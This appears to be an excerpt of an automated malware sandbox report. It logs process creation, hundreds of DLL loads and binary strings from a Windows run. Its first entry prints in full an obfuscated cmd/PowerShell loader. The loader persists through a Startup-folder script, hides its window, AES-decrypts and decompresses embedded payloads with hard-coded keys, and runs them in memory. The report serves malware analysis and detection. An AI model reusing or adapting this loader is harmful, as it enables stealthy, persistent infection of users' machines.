Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: avicap32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvfw32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Core.pdbb%R source: powershell.exe, 0000001D.00000002.2782843714.0000020CF10FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.Powershell.PSReadline.pdbpdbine.pdb source: powershell.exe, 00000014.00000002.2659859163.000001F3AE5B4000.00000004.00000020.00020000.00000000.sdmp
